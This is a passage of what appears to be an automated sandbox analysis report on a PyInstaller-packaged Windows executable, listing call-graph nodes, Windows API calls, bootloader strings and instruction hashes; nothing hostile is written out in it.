19560->19568 19583 7ff62c10f724 19560->19583 19562 7ff62c105a80 19563 7ff62c10f724 51 API calls 19562->19563 19562->19568 19564 7ff62c105a93 19563->19564 19565 7ff62c10f724 51 API calls 19564->19565 19564->19568 19566 7ff62c105aa6 19565->19566 19567 7ff62c10f724 51 API calls 19566->19567 19566->19568 19567->19568 19569 7ff62c105b00 19568->19569 19570 7ff62c105b1a 19569->19570 19571 7ff62c105b51 19570->19571 19572 7ff62c105b2a 19570->19572 19573 7ff62c10f5b8 21 API calls 19571->19573 19574 7ff62c104e7c _fread_nolock 11 API calls 19572->19574 19575 7ff62c105b3a 19572->19575 19573->19575 19574->19575 19575->19510 19577 7ff62c105940 19576->19577 19578 7ff62c10594d FileTimeToSystemTime 19576->19578 19577->19578 19580 7ff62c105948 19577->19580 19579 7ff62c105961 SystemTimeToTzSpecificLocalTime 19578->19579 19578->19580 19579->19580 19581 7ff62c0fc550 _log10_special 8 API calls 19580->19581 19582 
7ff62c105839 19581->19582 19582->19533 19584 7ff62c10f755 19583->19584 19585 7ff62c10f731 19583->19585 19587 7ff62c10f78f 19584->19587 19590 7ff62c10f7ae 19584->19590 19585->19584 19586 7ff62c10f736 19585->19586 19588 7ff62c104f08 _get_daylight 11 API calls 19586->19588 19589 7ff62c104f08 _get_daylight 11 API calls 19587->19589 19591 7ff62c10f73b 19588->19591 19592 7ff62c10f794 19589->19592 19593 7ff62c104f4c 45 API calls 19590->19593 19594 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19591->19594 19595 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 19592->19595 19598 7ff62c10f7bb 19593->19598 19596 7ff62c10f746 19594->19596 19597 7ff62c10f79f 19595->19597 19596->19562 19597->19562 19598->19597 19599 7ff62c1104dc 51 API calls 19598->19599 19599->19598 16853 7ff62c10f98c 16854 7ff62c10fb7e 16853->16854 16858 7ff62c10f9ce _isindst 16853->16858 16855 7ff62c104f08 _get_daylight 11 API calls 16854->16855 16856 7ff62c10fb6e 16855->16856 16857 7ff62c0fc550 _log10_special 8 API calls 16856->16857 16859 7ff62c10fb99 16857->16859 16858->16854 16860 7ff62c10fa4e _isindst 16858->16860 16874 7ff62c116194 16860->16874 16865 7ff62c10fbaa 16867 7ff62c10a900 _isindst 17 API calls 16865->16867 16869 7ff62c10fbbe 16867->16869 16872 7ff62c10faab 16872->16856 16899 7ff62c1161d8 16872->16899 16875 7ff62c10fa6c 16874->16875 16876 7ff62c1161a3 16874->16876 16881 7ff62c115598 16875->16881 16906 7ff62c1102d8 EnterCriticalSection 16876->16906 16882 7ff62c1155a1 16881->16882 16883 7ff62c10fa81 16881->16883 16884 7ff62c104f08 _get_daylight 11 API calls 16882->16884 16883->16865 16887 7ff62c1155c8 16883->16887 16885 7ff62c1155a6 16884->16885 16886 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16885->16886 16886->16883 16888 7ff62c10fa92 16887->16888 16889 7ff62c1155d1 16887->16889 16888->16865 16893 7ff62c1155f8 16888->16893 16890 7ff62c104f08 _get_daylight 11 API calls 16889->16890 16891 7ff62c1155d6 16890->16891 16892 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 
16891->16892 16892->16888 16894 7ff62c115601 16893->16894 16896 7ff62c10faa3 16893->16896 16895 7ff62c104f08 _get_daylight 11 API calls 16894->16895 16897 7ff62c115606 16895->16897 16896->16865 16896->16872 16898 7ff62c10a8e0 _invalid_parameter_noinfo 37 API calls 16897->16898 16898->16896 16907 7ff62c1102d8 EnterCriticalSection 16899->16907

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: d7252acce92481b4eccf3537b187236782f2d67d36c8bbdcf4d5647aad6e1b89
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: B6D18172A08A8286EF108F38EC592AD3760FF95B68F504235DE5E83AA4DF7CD154C746

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 62 7ff62c0f1000-7ff62c0f3806 call 7ff62c0ffe18 call 7ff62c0ffe20 call 7ff62c0fc850 call 7ff62c1053f0 call 7ff62c105484 call 7ff62c0f36b0 76 7ff62c0f3814-7ff62c0f3836 call 7ff62c0f1950 62->76 77 7ff62c0f3808-7ff62c0f380f 62->77 82 7ff62c0f383c-7ff62c0f3856 call 7ff62c0f1c80 76->82 83 7ff62c0f391b-7ff62c0f3931 call 7ff62c0f45c0 76->83 78 7ff62c0f3c97-7ff62c0f3cb2 call 7ff62c0fc550 77->78 87 7ff62c0f385b-7ff62c0f389b call 7ff62c0f8830 82->87 90 7ff62c0f3933-7ff62c0f3960 call 7ff62c0f7f90 83->90 91 7ff62c0f396a-7ff62c0f397f call 7ff62c0f2710 83->91 96 7ff62c0f38c1-7ff62c0f38cc call 7ff62c104f30 87->96 97 7ff62c0f389d-7ff62c0f38a3 87->97 103 7ff62c0f3984-7ff62c0f39a6 call 7ff62c0f1c80 90->103 104 7ff62c0f3962-7ff62c0f3965 call 7ff62c10004c 90->104 99 7ff62c0f3c8f 91->99 111 7ff62c0f38d2-7ff62c0f38e1 call 7ff62c0f8830 96->111 112 7ff62c0f39fc-7ff62c0f3a2a call 7ff62c0f8940 call 7ff62c0f89a0 * 3 96->112 100 7ff62c0f38a5-7ff62c0f38ad 97->100 101 7ff62c0f38af-7ff62c0f38bd call 7ff62c0f89a0 97->101 99->78 100->101 101->96 114 7ff62c0f39b0-7ff62c0f39b9 103->114 104->91 119 7ff62c0f39f4-7ff62c0f39f7 call 7ff62c104f30 111->119 120 7ff62c0f38e7-7ff62c0f38ed 111->120 138 7ff62c0f3a2f-7ff62c0f3a3e call 7ff62c0f8830 112->138 114->114 118 7ff62c0f39bb-7ff62c0f39d8 call 7ff62c0f1950 114->118 118->87 130 7ff62c0f39de-7ff62c0f39ef call 7ff62c0f2710 118->130 119->112 123 7ff62c0f38f0-7ff62c0f38fc 120->123 127 7ff62c0f3905-7ff62c0f3908 123->127 128 7ff62c0f38fe-7ff62c0f3903 123->128 127->119 131 7ff62c0f390e-7ff62c0f3916 call 7ff62c104f30 127->131 128->123 128->127 130->99 131->138 141 7ff62c0f3a44-7ff62c0f3a47 138->141 142 7ff62c0f3b45-7ff62c0f3b53 138->142 141->142 145 7ff62c0f3a4d-7ff62c0f3a50 141->145 143 7ff62c0f3b59-7ff62c0f3b5d 
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                                                                                                                                                                              • API String ID: 2776309574-4232158417
                                                                                                                                                                                                                                              • Opcode ID: b59ec9e18f1dd073e3b30b9e3dcae57b2124c2bfc9e785f26d811ecd91d23ade
                                                                                                                                                                                                                                              • Instruction ID: 07fd297666852b32e2404955a40a48b84be1a2526650888eaf70879d5613dbf1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59ec9e18f1dd073e3b30b9e3dcae57b2124c2bfc9e785f26d811ecd91d23ade
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5329D21A0C68299FE15DB259C6A3F92391AF557B0F444032DE4DC32C6EF6EE598C30A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C45
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A909
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62C10A8DF,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10A92E
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115C34
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                              • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                              • Instruction ID: d061b790e320011e79604dc9619bf2e00105fd14082ef2a8b2f39ae4daa24266
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1D526F0865286EF20DF2ADC4A1B96761EFA47B4F848036DE0DC7A95DF7CE4418742

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                                              • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction ID: f3ffae9780d734514fcb538aa07b0dcc20ba3d22e7a81d5df1322f1f37e7ba48
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1DF32B28A4686EF10CFA9D8962AC3761FB59BA8B014235DE1E977D4DF7DD051C301

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F842B
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84AE
                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84CD
                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84DB
                                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84EC
                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF62C0F8919,00007FF62C0F3F9D), ref: 00007FF62C0F84F5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction ID: 5a4c9c5329e50b266b8a1199ffe3e1a54a90469d85353712d09d069954f98b4d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0416021A0C94289EE209B24EC591FA6360FF96774F500332ED9DC2694EF7DE585C74A

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EAA
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C11560C
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115EBB
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C115598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155AC
                                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF62C115ECC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C1155C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C1155DC
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62C11610C), ref: 00007FF62C115EF3
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                              • Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                              • Instruction ID: 0e42b684767fa3ed664132e555174cfc10165d9da2b06abb7b9885b629ba32e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451C532A0864286EF10DF29DC8B5B96760FFA87A4F808135EA4DC7B95DF7CE4418746
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                              • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction ID: 5c466dba17c168f6fd9a0177b639aa02d90b1af07c7b936a826a034eeb355c6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F06862A1874186FBB09B64B8997667350EB85778F040335DE6D42AD4DF7CD089CA05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                                              • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                              • Instruction ID: 16f16bad3f3088495e80f7b032d49450eb5dffb7d82bcd1b3f6ff16d461f0912
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45020121F1DA9741FE55AB19AC0F2B92680AF51BB0F458635ED5DE73D2DEBCE4008382

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F7F90: _fread_nolock.LIBCMT ref: 00007FF62C0F803A
                                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF62C0F1A1B
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C0F2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                              • Opcode ID: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                              • Instruction ID: 71f3631da99adedec12b24781d99b66ab8a29dafd1101ad8d3dea79342d45c8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d37377fcd544e5bc457dd1f94d5fe39e21ec1f5484c8870d358832dbde1365c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1081D571A0C6868AEF20DB28DC562F923A0EF487A4F404431ED8DC7795DF7DE9858786

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                              • Opcode ID: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                              • Instruction ID: 670ebc5e103c052e2094edc188542366070cb4a3a4dd7a192199f55c72247a30
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e32c62f6317018de790b7a824d362476fee4f00d456471d65ae47693b1d932f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1851F361B0864796EE10AB299C461B923A0BF44BB4F444131EE0CC77D6DF3DF9A5C346

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF62C0F3CBB), ref: 00007FF62C0F8704
